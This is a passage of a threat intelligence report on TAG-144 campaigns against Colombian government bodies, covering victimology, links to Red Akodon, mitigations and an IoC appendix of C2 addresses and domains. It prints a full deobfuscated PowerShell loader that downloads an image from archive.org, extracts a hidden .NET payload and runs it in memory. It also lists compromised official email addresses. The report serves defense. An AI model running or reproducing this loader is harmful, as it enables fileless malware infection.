Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\n \r\nFigure 12: Obfuscated payload with Portuguese comments (Source: Recorded Future)\r\nPowerShell Script\r\nThe deobfuscated command line is shown in Figure 13.\r\n \r\n19 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\n \r\nFigure 13: Deobfuscated PowerShell command (Source: Recorded Future)\r\n \r\nThe executed command initiates PowerShell, decodes a Base64-encoded payload, and then runs the\r\ndecoded content via the Invoke-Expression cmdlet. Figure 14 shows the deobfuscated string with line\r\nbreaks added.\r\n \r\n20 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\n \r\n$atropisomer = 'VkFJ';\r\n$pyrography = [System.Convert]::FromBase64String($atropisomer);\r\n$automaticities = [System.Text.Encoding]::UTF8.GetString($pyrography);\r\n$sycoma = 'Q2xhc3NMaWJyYXJ5MS5Ib21l';\r\n$repedation = [System.Convert]::Frombase64String($sycoma);\r\n$arboricultural = [System.Text.Encoding]::UTF8.GetString($repedation);\r\n \r\nAdd-Type -AssemblyName System.Drawing;\r\n$tormodont =\r\n'https://archive[.]org/download/universe-1733359315202-8750/universe-173335931\r\n5202-8750.jpg';\r\n$sclere = New-Object System.Net.WebClient;\r\n$sclere.Headers.Add('User-Agent','Mozilla/5.0');\r\n$sorority = $sclere.DownloadData($tormodont);\r\n \r\n$backpack = [byte[]](0x42, 0x4D, 0x72, 0x6E, 0x37, 0x00, 0x00, 0x00, 0x00,\r\n0x00, 0x36, 0x00, 0x00, 0x00, 0x28, 0x00, 0x00, 0x00, 0x64, 0x00, 0x00, 0x00,\r\n0x4D, 0x2F, 0x00, 0x00, 0x01, 0x00, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x3C,\r\n0x6E, 0x37, 0x00, 0xC4, 0x0E, 0x00, 0x00, 0xC4, 0x0E, 0x00, 0x00, 0x00, 0x00,\r\n0x00, 0x00, 0x00, 0x00, 0x00, 0x00);\r\n$energises = -1;\r\n \r\nfor ($scattered = 0; $scattered -le $sorority.Length - $backpack.Length;\r\n$scattered++) {\r\n $lipogenys = $true;\r\n \r\n for ($Phalanx = 0; $Phalanx -lt $backpack.Length; $Phalanx++) {\r\n if ($sorority[$scattered + $Phalanx] -ne $backpack[$Phalanx]) {\r\n $lipogenys = $Brunhild;\r\n break;\r\n }\r\n }\r\n \r\n if ($lipogenys) {\r\n $energises = $scattered;\r\n break;\r\n }\r\n}\r\n \r\nif ($energises -eq -1) { return }\r\n \r\n$splenoncus = $sorority[$energises..($sorority.Length - 1)];\r\n$varicelliform = New-Object IO.MemoryStream;\r\n$varicelliform.Write($splenoncus, 0, $splenoncus.Length);\r\n$varicelliform.Seek(0, 'Begin') | Out-Null;\r\n \r\n \r\n21 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\n$Hippocrene = [Drawing.Bitmap]::FromStream($varicelliform);\r\n$Coreopsis = New-Object Collections.Generic.List[Byte];\r\n \r\nfor ($reusably = 0; $reusably -lt $Hippocrene.Height; $reusably++) {\r\n for ($digoxin = 0; $digoxin -lt $Hippocrene.Width; $digoxin++) {\r\n $cradlelike = $Hippocrene.GetPixel($digoxin, $reusably);\r\n $Coreopsis.Add($cradlelike.R);\r\n $Coreopsis.Add($cradlelike.G);\r\n $Coreopsis.Add($cradlelike.B);\r\n }\r\n}\r\n \r\n$bolsterers = [BitConverter]::ToInt32($Coreopsis.GetRange(0, 4).ToArray(), 0);\r\n$scoundreldom = $Coreopsis.GetRange(4, $bolsterers).ToArray();\r\n$flamers =\r\n[Convert]::ToBase64String($scoundreldom).Replace('A','@').Replace('@','A');\r\n$supinely = '==AMv4ET5l1aC1EVvQ2LlVmLlR3chB3LvoDc0RHa'.Replace('}|','t');\r\n$amaurotic = [Convert]::FromBase64String($flamers);\r\n$sycee = [Reflection.Assembly]::Load($amaurotic);\r\n \r\n$astatizer =\r\n@($supinely,'','','','MSBuild','','','','','C:\\Users\\Public\\Downloads','creels\r\n','js','','','backticks','2','');\r\n$sycee.GetType($arboricultural).GetMethod($automaticities).Invoke($snarl,$asta\r\ntizer);\r\n \r\n$Hippocrene.Dispose();\r\n$varicelliform.Dispose();\r\nFigure 14: Deobfuscated string (Source: Recorded Future)\r\n \r\nThe PowerShell script retrieves a JPG image from\r\nhxxps://archive[.]org/download/universe-1733359315202-8750/universe-1733359315202-8750.jpg. It\r\nthen employs steganographic techniques to scan the image’s pixel data for a specific byte marker,\r\nwhich it uses to locate and extract an embedded payload. The extracted content is a .NET assembly\r\nthat the script loads directly into memory. Execution is carried out by invoking the VAI method within the\r\nClassLibrary1.Home class, allowing the payload to run without ever being written to disk.\r\n \r\nNotably, the same archive[.]org URL was observed in connection with XWorm samples associated with\r\nthe domain deadpoolstart[.]lovestoblog[.]com and\r\ndeadpoolstart2064[.]duckdns[.]org, which also featured similarly named files, including (1, 2):\r\n \r\n●NUEVO_REPORTE_ANEXO_POR_SANCIONES_EFECTUADAS_HALLAZGOS_IRREGULARIDADES_AUD\r\nITORIA_SISTEMAS_DE_SALUD_E.js (SHA256:\r\naee42a6d8d22a421fd445695d8b8c8b3311fa0dc0476461ea649a08236587edd)\r\n \r\n22 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\n●NUEVO_REPORTE_ANEXO_POR_SANCIONES_EFECTUADAS_HALLAZGOS_IRREGULARIDADES_AUD\r\nITORIA_SISTEMAS_DE_SALUD_E.rar (SHA256:\r\n0fd706ebd884e6678f5d0c73c42d7ee05dcddd53963cf53542d5a8084ea82ad1)\r\nVictimology\r\nOverall, Insikt Group identified a significant number of TAG-144 victims, all of which, where attribution\r\nwas possible, were Colombian entities. Notably, as evidenced by victims associated with Clusters 1 and\r\n2, the majority were directly tied to Colombian government institutions (see Figure 15). Beyond these,\r\nadditional victims were identified across the healthcare, retail, transportation, defense, and oil sectors.\r\nImportantly, several of these non-governmental entities maintain some degree of affiliation with the\r\nstate.\r\n \r\n \r\nFigure 15: Breakdown of TAG-144 victims observed between May 2024 and July 2025 (Source: Recorded Future)\r\n \r\nAlthough TAG-144 has targeted other sectors and has occasionally been linked to intrusions in\r\nadditional South American countries such as Ecuador, as well as Spanish-speaking victims in the US, its\r\nprimary focus has consistently remained on Colombia, particularly on government entities. This\r\npersistent targeting raises questions about the threat group’s true motivations, such as whether it\r\n \r\n23 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\noperates solely as a financially driven threat actor leveraging established tools, techniques, and\r\nmonetization strategies, or whether elements of state-sponsored espionage are also at play.\r\nOverlap with Red Akodon\r\nIn May 2024, SCILabs reported on a threat actor it named Red Akodon, which closely resembled Blind\r\nEagle in terms of TTPs. The threat actor primarily targeted Colombian government entities using RATs\r\nsuch as REMCOS RAT, QuasarRAT, AsyncRAT, and XWorm. The attacks were delivered via phishing\r\nemails posing as legal notices or judicial summonses, allegedly sent by Colombian institutions like the\r\nFiscalía General de la Nación and the Juzgado 06 Civil del Circuito de Bogotá. Despite the similarities,\r\nSCILabs chose to track Red Akodon as a distinct threat actor at the time of writing.\r\nAmong others, the report identified four GitHub repository usernames: “jairpicc”, “santiagonasar”,\r\n“colombo08125”, and “mastermr02456”. Of note, jairpicc also appeared in association with a Pastebin\r\naccount observed on August 23, 2024 (see Figure 16).\r\n \r\nFigure 16: Pastebin account linked to jairpicc (Source: Recorded Future)\r\nThe Pastebin account was associated with multiple Pastebin links, at least two of which returned\r\nBitbucket URLs hosting AsyncRAT payloads. These AsyncRAT payloads communicated with domains\r\nsuch as enviasept[.]duckdns[.]org, enviosep04[.]duckdns[.]org, sost2024ene[.]duckdns[.]org, and\r\ntrabajo25[.]duckdns[.]org, all linked to TAG-144. Additionally, Insikt Group noted that the payloads\r\nhosted on these Bitbucket URLs followed file naming conventions consistent with those observed in\r\nTAG-144 infrastructure. For instance, one Pastebin link returned the URL\r\nhxxps://bitbucket[.]org/descargggt/servdifr/downloads/remcoss[.]txt, with the filename remcoss.txt\r\nmatching file names found in open directories previously reported in association with TAG-144.\r\nAdditional Bitbucket URLs hosting files with matching filenames that lead to AsyncRAT infections are\r\nprovided in Appendix A.\r\nAdditionally, Red Akodon appears to have used at least two likely compromised email addresses\r\nassociated with Colombian government entities: nomina[@]magdalena[.]gov[.]co and\r\nnpereza[@]cendoj[.]ramajudicial[.]gov[.]co. Notably, on October 31, 2024, the Colombian cybersecurity\r\nblog ¡Mucho Hacker! reported on related activity involving similar abuse. This report highlighted the use\r\n \r\n24 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nof legitimate government-linked email addresses, including abogados[@]hujmb[.]gov[.]co and\r\nj03mpmixartado[@]cendoj[.]ramajudicial[.]gov[.]co. The blog speculated that the threat actor either\r\nhad access to internal systems, allowing them to create legitimate-looking email accounts, or\r\npossessed an undisclosed capability to spoof official addresses.\r\nInsikt Group confirmed that the email address j03mpmixartado[@]cendoj[.]ramajudicial[.]gov[.]co is\r\nlegitimate and seems to belong to the Juzgado 003 Penal Municipal con Funciones Mixtas de\r\nChiquinquirá. Furthermore, the address was found in malware logs associated with the Stealc\r\ninfostealer, suggesting compromise. The email appears to be linked to a Colombian public official\r\nserving as Secretary of the Second Civil Circuit Court in Chiquinquirá.\r\nThe malware logs also contain email addresses believed to be leveraged for phishing purposes,\r\nincluding:\r\n●ftorreshe[@]cendoj[.]ramajudicial[.]gov[.]co\r\n●j01pmpalchiquinquira[@]cendoj[.]ramajudicial[.]gov[.]co\r\n●j02cctochiquinquira[@]cendoj[.]ramajudicial[.]gov[.]co\r\n●jcmpalchoconta[@]cendoj[.]ramajudicial[.]gov[.]co\r\n●raccionestutj02cctochiquinquira[@]cendoj[.]ramajudicial[.]gov[.]co\r\n●repchiquinquiraboy[@]cendoj[.]ramajudicial[.]gov[.]co\r\n●silay.salamanca699[@]educacionbogota[.]edu[.]co\r\n \r\nInsikt Group assesses that TAG-144 considers the use of compromised government email accounts to\r\ndeliver spearphishing emails a standard part of its toolkit and is likely to continue employing this tactic.\r\nMitigations\r\n●Recorded Future Threat Intelligence: Recorded Future customers can proactively mitigate\r\nthreats by operationalizing data from the Intelligence Cloud. Leverage continuously updated Risk\r\nLists to blocklist IP addresses associated with TAG-144, thereby preventing internal\r\ncommunication with known malicious infrastructure.\r\n●Recorded Future Detections: Recorded Future provides Sigma, YARA, and Snort rules that can\r\nbe integrated into your SIEM or endpoint detection and response (EDR) tools. These rules detect\r\nthe presence or execution of malware families linked to TAG-144 and similar threats.\r\n●Recorded Future Network Intelligence: Recorded Future’s Malicious Traffic Analysis (MTA)\r\nevents help identify servers engaged in exfiltration activity with known malicious infrastructure.\r\nThese insights are powered by proprietary methodologies. Use general MTA event queries for\r\nbroad monitoring, or targeted queries to focus specifically on malware families associated with\r\nTAG-144.\r\n●Recorded Future Monitoring: Use Recorded Future to detect, flag, and block inbound and\r\noutbound traffic involving email addresses or domains that show signs of compromise, such as\r\nthose appearing in data leaks, malware logs, or underground forums.\r\n \r\n25 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\n●Monitoring for Potential Network Device-Based Threat Activity: Monitor traffic from the IP\r\naddresses listed in Appendix A, which are associated with potentially compromised devices,\r\nincluding Mikrotik routers, and which have been observed communicating with known TAG-144\r\nC2 infrastructure.\r\n●LIS Flagging and Blocking: Consider blocking the use of specific LIS on your corporate network\r\nif not required for legitimate purposes. Network defenders must strike a balance between\r\nmitigating malicious communication via LIS and excessively restricting access to services that\r\nare allowed or necessary on their network. Previous Insikt Group reports, such as “Threat Actors\r\nLeverage Internet Services to Enhance Data Theft and Weaken Security Defenses,” as well as\r\nthis report on TAG-144, can help inform those decisions.\r\n●Email Traffic Filtering: Implement a robust email filtering system to detect and flag messages\r\ncontaining malicious attachments or links. Ensure that suspicious emails are quarantined for\r\ndetailed inspection, reducing the risk of phishing attacks and credential compromise.\r\nOutlook\r\nInsikt Group has identified five distinct activity clusters linked to TAG-144, active at various points\r\nthroughout 2024 and 2025. These clusters have primarily targeted Colombian government entities at\r\nthe local, municipal, and federal levels, while also affecting private sector and non-governmental\r\norganizations. Although they share common TTPs such as the use of open-source or cracked RATs,\r\ndynamic domain providers, and LIS for staging, each cluster demonstrates distinct infrastructure,\r\nmalware deployment methods, and operational approaches. TAG-144 has also been linked to Red\r\nAkodon and has been observed using compromised Colombian government email accounts in\r\nspearphishing campaigns.\r\n \r\nTAG-144 is part of a growing cybercriminal ecosystem in South America, where rapid digitalization and\r\nlimited cyber defenses have contributed to more cybercrime. Looking ahead, Insikt Group assesses that\r\nTAG-144 will likely continue to focus on Colombian government targets, while maintaining its current\r\noperational patterns. This includes continued use of compromised email addresses, dynamic DNS\r\nservices, abuse of LIS, and deployment of customized tools such as the previously observed\r\nBlotchyQuasar variant of QuasarRAT. TAG-144 is also expected to adapt by integrating new cracked or\r\nopen-source tools and identifying additional LIS platforms to exploit. Furthermore, the threat group is\r\nlikely to deepen its involvement in the broader cybercriminal ecosystem through collaboration with tool\r\ndevelopers and affiliated threat actors. Given its persistent targeting, technical adaptability, and\r\noperational success, Insikt Group assesses that TAG-144 will remain a significant threat to its typical\r\nvictim profile for the foreseeable future.\r\n \r\n26 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nAppendix A: Cluster 1 IP Addresses\r\nIP Address ASN Type Malware Families\r\n45[.]133[.]180[.]26 AS9009 TorGuard VPN server AsyncRAT\r\n45[.]133[.]180[.]154 AS9009 TorGuard VPN server AsyncRAT\r\n146[.]70[.]137[.]18 AS9009 TorGuard VPN server AsyncRAT\r\n146[.]70[.]137[.]90 AS9009 TorGuard VPN server DcRAT, AsyncRAT, REMCOS RAT\r\n146[.]70[.]50[.]42 AS9009 TorGuard VPN server AsyncRAT\r\n146[.]70[.]51[.]42 AS9009 TorGuard VPN server DcRAT\r\n146[.]70[.]57[.]58 AS9009 TorGuard VPN server AsyncRAT\r\n146[.]70[.]83[.]218 AS9009 TorGuard VPN server AsyncRAT\r\n181[.]235[.]4[.]255 AS3816 Colombian ISP REMCOS\r\n193[.]56[.]253[.]66 AS9009 TorGuard VPN server REMCOS\r\n93[.]115[.]35[.]146 AS9009 TorGuard VPN server DcRAT\r\n \r\n \r\n27 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nAppendix B: Indicators of Compromise (IoCs)\r\nCluster 1 IP Addresses:\r\n45[.]133[.]180[.]26\r\n45[.]133[.]180[.]154\r\n93[.]115[.]35[.]146\r\n146[.]70[.]50[.]42\r\n146[.]70[.]51[.]42\r\n146[.]70[.]57[.]58\r\n146[.]70[.]83[.]218\r\n146[.]70[.]137[.]18\r\n146[.]70[.]137[.]90\r\n181[.]235[.]4[.]255\r\n181[.]235[.]10[.]163\r\n181[.]235[.]15[.]197\r\n186[.]169[.]48[.]180\r\n186[.]169[.]50[.]123\r\n186[.]169[.]80[.]199\r\n186[.]169[.]80[.]207\r\n186[.]169[.]82[.]147\r\n186[.]169[.]90[.]53\r\n193[.]56[.]253[.]66\r\n \r\nCluster 1 Domains:\r\nalma27[.]duckdns[.]org\r\naseguradotelle[.]duckdns[.]org\r\ndiazpool14[.]duckdns[.]org\r\ndnse2542[.]duckdns[.]org\r\nenvio-18-2[.]duckdns[.]org\r\nenvio01[.]ddns[.]net\r\nenvio02-04[.]duckdns[.]org\r\nenvio05-06[.]duckdns[.]org\r\nenvio07[.]duckdns[.]org\r\nenvio10-04-25[.]duckdns[.]org\r\nenvio1010[.]duckdns[.]org\r\nenvio104[.]duckdns[.]org\r\nenvio11-04[.]duckdns[.]org\r\nenvio14-03[.]duckdns[.]org\r\nenvio14-05[.]duckdns[.]org\r\nenvio1414[.]duckdns[.]org\r\nenvio15-005[.]duckdns[.]org\r\nenvio1515[.]duckdns[.]org\r\nenvio16-05[.]duckdns[.]org\r\nenvio1616[.]duckdns[.]org\r\nenvio19-05[.]duckdns[.]org\r\nenvio19-055[.]duckdns[.]org\r\nenvio1919[.]duckdns[.]org\r\nenvio20-03[.]duckdns[.]org\r\nenvio2020[.]duckdns[.]org\r\nenvio21-005[.]duckdns[.]org\r\nenvio21-05[.]duckdns[.]org\r\nenvio2121[.]duckdns[.]org\r\nenvio2222[.]duckdns[.]org\r\nenvio2333[.]duckdns[.]org\r\nenvio25-03[.]duckdns[.]org\r\nenvio25-04[.]duckdns[.]org\r\nenvio25-3[.]duckdns[.]org\r\nenvio25100255[.]duckdns[.]org\r\n \r\n28 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nenvio26-005[.]duckdns[.]org\r\nenvio26-03[.]duckdns[.]org\r\nenvio26-05[.]duckdns[.]org\r\nenvio266[.]duckdns[.]org\r\nenvio28-003[.]duckdns[.]org\r\nenvio28[.]duckdns[.]org\r\nenvio29[.]duckdns[.]org\r\nenvio3-04[.]duckdns[.]org\r\nenvio31-03[.]duckdns[.]org\r\nenvio31[.]duckdns[.]org\r\nenvio55[.]duckdns[.]org\r\nenvio6-06[.]duckdns[.]org\r\nenvio666[.]duckdns[.]org\r\nenvioo20020[.]duckdns[.]org\r\nhold-asy[.]duckdns[.]org\r\nnewremco[.]duckdns[.]org\r\nojosostenerfebrero[.]duckdns[.]org\r\npooldiaz14[.]duckdns[.]org\r\nqua25q[.]duckdns[.]org\r\nqua25qua[.]duckdns[.]org\r\nrem25rem[.]duckdns[.]org\r\nremc21[.]duckdns[.]org\r\nrespaldito01[.]duckdns[.]org\r\nrespaldito03[.]duckdns[.]org\r\nrespaldomax3[.]duckdns[.]org\r\nrespaldomax4[.]duckdns[.]org\r\nrespaldomx1[.]duckdns[.]org\r\nrespaldomx2[.]duckdns[.]org\r\nrespaldomx5[.]duckdns[.]org\r\nsend9214[.]duckdns[.]org\r\nsendiadad[.]duckdns[.]org\r\ntrabajonuevos[.]duckdns[.]org\r\nusooo205[.]duckdns[.]org\r\n \r\nCluster 2 IP Addresses:\r\n45[.]77[.]72[.]102\r\n64[.]188[.]9[.]172\r\n64[.]188[.]9[.]173\r\n64[.]188[.]9[.]175\r\n64[.]188[.]9[.]177\r\n172[.]93[.]160[.]188\r\n177[.]255[.]84[.]173\r\n179[.]14[.]8[.]131\r\n179[.]14[.]11[.]213\r\n181[.]131[.]217[.]63\r\n191[.]88[.]249[.]175\r\n192[.]169[.]69[.]26\r\n \r\nCluster 2 Domains:\r\nagilizavacunate202120212021[.]duckdns[.]org\r\nagosagosagostooo20242024[.]duckdns[.]org\r\nandresbermudez3080[.]duckdns[.]org\r\nandresbermudezrespaldok30[.]duckdns[.]org\r\narannsasaaransasaturituri2024[.]duckdns[.]org\r\narmadnocaballerodominio[.]con-ip[.]com\r\narmandocaceres4050[.]con-ip[.]com\r\narmandoferreiro701020dominio[.]con-ip[.]com\r\narmandovillareal5020[.]con-ip[.]com\r\narmandovillareal502011[.]con-ip[.]com\r\nbriana2024[.]kozow[.]com\r\n \r\n29 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nbriana4000[.]duckdns[.]org\r\nbrianaf511[.]duckdns[.]org\r\ncamanopetro[.]con-ip[.]com\r\ncamarasdeseguridad202420242024[.]duckdns[.]org\r\ncamiloferreiro907010[.]con-ip[.]com\r\ncamiloguerrero5040[.]con-ip[.]com\r\ncanastapatrones[.]con-ip[.]com\r\ncarlosrenteria9050[.]con-ip[.]com\r\ncarmengutierrez9030[.]con-ip[.]com\r\nccerrado10[.]con-ip[.]com\r\ncococovid202420242024[.]duckdns[.]org\r\ncomidafood[.]con-ip[.]com\r\ncopaamerica2022024transmision[.]con-ip[.]com\r\ncristiansantodomingo203010[.]con-ip[.]com\r\ndanielfernandez502010[.]con-ip[.]com\r\ndavidcristiano8070[.]con-ip[.]com\r\ndavidcristiano80702[.]con-ip[.]com\r\ndavidcristiano80703[.]con-ip[.]com\r\ndesdeseptiempresesiente[.]con-ip[.]com\r\ndiciembrearbolitodebelen20222022[.]duckdns[.]org\r\ndmforjadores[.]con-ip[.]com\r\ndominiharrypotter202420242024[.]duckdns[.]org\r\ndominiogeneral20240202402024[.]duckdns[.]org\r\ndominioseternosgraciasadios20230230230[.]duckdns[.]org\r\neneroeneroenero2023202311[.]duckdns[.]org\r\nenvioasy24[.]kozow[.]com\r\nfebreroynoesvisiesto20222022[.]duckdns[.]org\r\nfernandocuellar909080[.]con-ip[.]com\r\nfernandoesquivel707020[.]con-ip[.]com\r\nfernandoizquierdo9080[.]con-ip[.]com\r\nfranciscogonzalezdomini[.]con-ip[.]com\r\ngonorreaomegonorrea2021[.]duckdns[.]org\r\nidiotobocaefabmantenio2021[.]duckdns[.]org\r\njaimegonzalez201020[.]con-ip[.]com\r\njuancaf4000[.]duckdns[.]org\r\nlaazcarate202120212021[.]duckdns[.]org\r\nllllllllllllllllllabril26de2021vacunate[.]duckdns[.]org\r\nmarli27[.]duckdns[.]org\r\nmarli27[.]kozow[.]com\r\nmayoelmesdelamosca202422024[.]duckdns[.]org\r\nmayomayomayo202202222022[.]duckdns[.]org\r\nmedicosdelacostasas[.]con-ip[.]com\r\nmetropolispedro16[.]con-ip[.]com\r\nneivanuevasde[.]con-ip[.]com\r\nninosey02[.]con-ip[.]com\r\nnopedro[.]con-ip[.]com\r\nnuevoremremrem20232023[.]duckdns[.]org\r\npasarasaberquecuenta[.]con-ip[.]com\r\npaseoencarro2024[.]con-ip[.]com\r\npasoscon[.]con-ip[.]com\r\npasosconlz[.]con-ip[.]com\r\npasticosmemos[.]con-ip[.]com\r\npenoncaminosdel[.]con-ip[.]com\r\npesosdepesoslibras[.]duckdns[.]org\r\npr1275995[.]con-ip[.]com\r\nmono2024[.]kozow[.]com\r\nprogramahumanitaria202220222022[.]duckdns[.]org\r\npruebadenuevonuevo202024202024[.]duckdns[.]org\r\nqjunioo2024020242024infinito[.]duckdns[.]org\r\nramiromartinelli909070[.]con-ip[.]com\r\n \r\n30 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\nremixripiolo[.]con-ip[.]com\r\nremremrem2021marzo2021[.]duckdns[.]org\r\nrodrigobermudez9080[.]con-ip[.]com\r\nsebastianguerrero5040[.]con-ip[.]com\r\nsebastiansagbini907060[.]con-ip[.]com\r\nsemetiooctubre2022202220222022[.]duckdns[.]org\r\nsuperabrilabrilabril20242024[.]con-ip[.]com\r\nsyscsycsyc20212021[.]duckdns[.]org\r\ntercepico202120212021[.]duckdns[.]org\r\nmayomayomayo202202222022[.]duckdns[.]org\r\nprogramahumanitaria202220222022[.]duckdns[.]org\r\n \r\nCluster 2 “deadpoolstart”-Themed Domains:\r\ndeadpoolstart2024[.]con-ip[.]com\r\ndeadpoolstart2025[.]con-ip[.]com\r\ndeadpoolstart2025[.]duckdns[.]org\r\ndeadpoolstart2026[.]con-ip[.]com\r\ndeadpoolstart2026[.]duckdns[.]org\r\ndeadpoolstart2027[.]con-ip[.]com\r\ndeadpoolstart2027[.]duckdns[.]org\r\ndeadpoolstart2028[.]con-ip[.]com\r\ndeadpoolstart2028[.]duckdns[.]org\r\ndeadpoolstart2029[.]con-ip[.]com\r\ndeadpoolstart2029[.]duckdns[.]org\r\ndeadpoolstart2030[.]con-ip[.]com\r\ndeadpoolstart2030[.]duckdns[.]org\r\ndeadpoolstart2033[.]duckdns[.]org\r\ndeadpoolstart2034[.]duckdns[.]org\r\ndeadpoolstart2035[.]duckdns[.]org\r\ndeadpoolstart2036[.]duckdns[.]org\r\ndeadpoolstart2037[.]duckdns[.]org\r\ndeadpoolstart2038[.]duckdns[.]org\r\ndeadpoolstart2041[.]duckdns[.]org\r\ndeadpoolstart2044[.]duckdns[.]org\r\ndeadpoolstart2049[.]duckdns[.]org\r\ndeadpoolstart2051[.]duckdns[.]org\r\ndeadpoolstart2052[.]duckdns[.]org\r\ndeadpoolstart2053[.]duckdns[.]org\r\ndeadpoolstart2054[.]duckdns[.]org\r\ndeadpoolstart2059[.]duckdns[.]org\r\ndeadpoolstart2060[.]duckdns[.]org\r\ndeadpoolstart2061[.]duckdns[.]org\r\ndeadpoolstart2063[.]duckdns[.]org\r\ndeadpoolstart2064[.]duckdns[.]org\r\ndeadpoolstart2065[.]duckdns[.]org\r\n \r\nCluster 3 IP Addresses:\r\n181[.]131[.]216[.]206\r\n181[.]131[.]218[.]182\r\n181[.]131[.]219[.]42\r\n \r\nCluster 3 Domains:\r\nandersondavid4070[.]duckdns[.]org\r\nandersondesousa9030[.]con-ip[.]com\r\nandresguerrero90808[.]con-ip[.]com\r\nandresrestrepo901020[.]duckdns[.]org\r\nandressinisterra508070[.]duckdns[.]org\r\nandresvalderrama4070[.]duckdns[.]org\r\nantonioguerrero4050[.]duckdns[.]org\r\narmandocaceres4050[.]con-ip[.]com\r\n \r\n31 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\narmandoquiroz7020[.]duckdns[.]org\r\narmandosandoval70501023[.]duckdns[.]org\r\narmandovillareal504010[.]duckdns[.]org\r\ncamiloferreiro907010[.]con-ip[.]com\r\ncamiloguerrero5040[.]con-ip[.]com\r\ncarloscaicedo4050202[.]duckdns[.]org\r\ncarlosfernandez401020[.]duckdns[.]org\r\ncarlosmendoza504070[.]duckdns[.]org\r\ncarlosrenteria9050[.]con-ip[.]com\r\ncarlossantrich9080[.]duckdns[.]org\r\ncarlosurrutia805020[.]duckdns[.]org\r\ncarlosurrutia8050202[.]duckdns[.]org\r\ncarlosvillalba9040[.]duckdns[.]org\r\ncarmengutierrez9030[.]con-ip[.]com\r\ncarmenzavillareal4080[.]duckdns[.]org\r\ndavidcristiano8070[.]con-ip[.]com\r\ndavidcristiano80702[.]con-ip[.]com\r\ndavidcristiano80703[.]con-ip[.]com\r\nedgardocarrascal904050[.]duckdns[.]org\r\nfernandocaballero50702[.]duckdns[.]org\r\nfernandogonzalez809010[.]duckdns[.]org\r\nfernandoizquierdo9080[.]con-ip[.]com\r\nfernandolopez105040[.]duckdns[.]org\r\nfranciscodaza3090[.]duckdns[.]org\r\ngermancastillo9050[.]duckdns[.]org\r\njaimegonzalez201020[.]con-ip[.]com\r\njaviersandoval9030[.]duckdns[.]org\r\nmiguelurrutia7040[.]duckdns[.]org\r\nrodrigobermudez9080[.]con-ip[.]com\r\nsandraverdecia708091[.]duckdns[.]org\r\nsantiagovenecia7050[.]duckdns[.]org\r\nsantiagovenecia70502[.]duckdns[.]org\r\nsantiagovillareal101010[.]duckdns[.]org\r\nsebastiancorrea905040[.]duckdns[.]org\r\nsebastianguerrero5040[.]con-ip[.]com\r\nsebastiansagbini907060[.]con-ip[.]com\r\nsergiovalderrama2040[.]duckdns[.]org\r\ntrinidadtobago5020[.]duckdns[.]org\r\nvelisariosantiago7080[.]duckdns[.]org\r\n \r\nCluster 4 IP Addresses:\r\n45[.]135[.]232[.]38\r\n46[.]246[.]82[.]9\r\n89[.]117[.]23[.]25\r\n178[.]73[.]218[.]8\r\n181[.]235[.]3[.]0\r\n191[.]93[.]113[.]151\r\n \r\nCluster 4 Domains:\r\naets[.]duckdns[.]org\r\nasxyz[.]duckdns[.]org\r\nasyfas[.]duckdns[.]org\r\nasygo[.]duckdns[.]org\r\nasynpro[.]duckdns[.]org\r\ncamabinga1[.]duckdns[.]org\r\ndcfast[.]duckdns[.]org\r\ndcglos[.]duckdns[.]org\r\ndckazts[.]duckdns[.]org\r\ndcmxz[.]duckdns[.]org\r\ndcuxpag[.]duckdns[.]org\r\n \r\n32 CTA-2025-0826 Recorded Future\r\n®\r\n | www.recordedfuture.com\n\nCYBER THREAT ANALYSIS\r\n \r\ndrgost[.]duckdns[.]org\r\ndrpras[.]duckdns[.]org\r\ndxpam[.]duckdns[.]org\r\nenviasept[.]duckdns[.]org\r\nenviosep04[.]duckdns[.]org\r\nkeepz[.]duckdns[.]org\r\nojososteneragosto[.]duckdns[.]org\r\nqfast[.]duckdns[.]org\r\nrfwr[.]duckdns[.]org\r\nrosks[.]duckdns[.]org\r\nrxsas[.]duckdns[.]org\r\nsost10[.]duckdns[.]org\r\nsost2024ene[.]duckdns[.]org\r\nsostenerdcrat[.]duckdns[.]org\r\nsostenermio2024[.]duckdns[.]org\r\nsostenermio2025[.]duckdns[.]org\r\nsostenerstartup[.]duckdns[.]org\r\ntestedark[.]writesthisblog[.]com\r\n \r\nCluster 5 IP 